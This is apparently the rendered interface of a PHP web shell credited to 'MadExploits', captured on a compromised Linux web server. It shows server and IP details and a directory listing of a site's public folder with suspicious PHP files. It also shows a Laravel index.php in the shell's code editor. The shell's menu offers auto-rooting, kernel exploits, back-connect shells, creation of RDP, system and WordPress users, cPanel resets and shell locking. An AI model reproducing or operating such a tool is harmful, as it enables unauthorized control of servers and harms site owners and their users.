Linux localhost.localdomain 3.10.0-1160.80.1.el7.x86_64 #1 SMP Tue Nov 8 15:48:59 UTC 2022 x86_64
Apache
: 10.29.51.72 | : 216.73.216.153
Cant Read [ /etc/named.conf ]
7.2.34
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
mpc_emas /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
Cannavaro
[ DIR ]
drwxr-xr-x
Login_v2
[ DIR ]
drwxr-xr-x
adminLTE
[ DIR ]
drwxr-xr-x
bower_components
[ DIR ]
drwxr-xr-x
ckfinder
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
dumpfiles
[ DIR ]
drwxr-xr-x
front
[ DIR ]
drwxr-xr-x
fullcalendar
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
newsticker
[ DIR ]
drwxr-xr-x
untrackedfiles
[ DIR ]
drwxr-xr-x
uploads
[ DIR ]
drwxrwxrwx
uploads_20062025_2000
[ DIR ]
drwxr-xr-x
.htaccess
573
B
-rw-r--r--
ams.php
7.35
KB
-rw-r--r--
ams.txt
0
B
-rw-r--r--
ecuti.php
4.89
KB
-rw-r--r--
favicon.ico
0
B
-rw-r--r--
index.php
1.8
KB
-rw-r--r--
robots.txt
26
B
-rw-r--r--
toaccessdb.php
349.5
KB
-rw-r--r--
web.config
937
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php /** * Laravel - A PHP Framework For Web Artisans * * @package Laravel * @author Taylor Otwell <taylor@laravel.com> */ /* |-------------------------------------------------------------------------- | Register The Auto Loader |-------------------------------------------------------------------------- | | Composer provides a convenient, automatically generated class loader for | our application. We just need to utilize it! We'll simply require it | into the script here so that we don't have to worry about manual | loading any of our classes later on. It feels great to relax. | */ require __DIR__.'/../bootstrap/autoload.php'; /* |-------------------------------------------------------------------------- | Turn On The Lights |-------------------------------------------------------------------------- | | We need to illuminate PHP development, so let us turn on the lights. | This bootstraps the framework and gets it ready for use, then it | will load up this application so that we can run it and send | the responses back to the browser and delight our users. | */ $app = require_once __DIR__.'/../bootstrap/app.php'; /* |-------------------------------------------------------------------------- | Run The Application |-------------------------------------------------------------------------- | | Once we have the application, we can handle the incoming request | through the kernel, and send the associated response back to | the client's browser allowing them to enjoy the creative | and wonderful application we have prepared for them. | */ $kernel = $app->make(Illuminate\Contracts\Http\Kernel::class); $response = $kernel->handle( $request = Illuminate\Http\Request::capture() ); $response->send(); $kernel->terminate($request, $response);
Close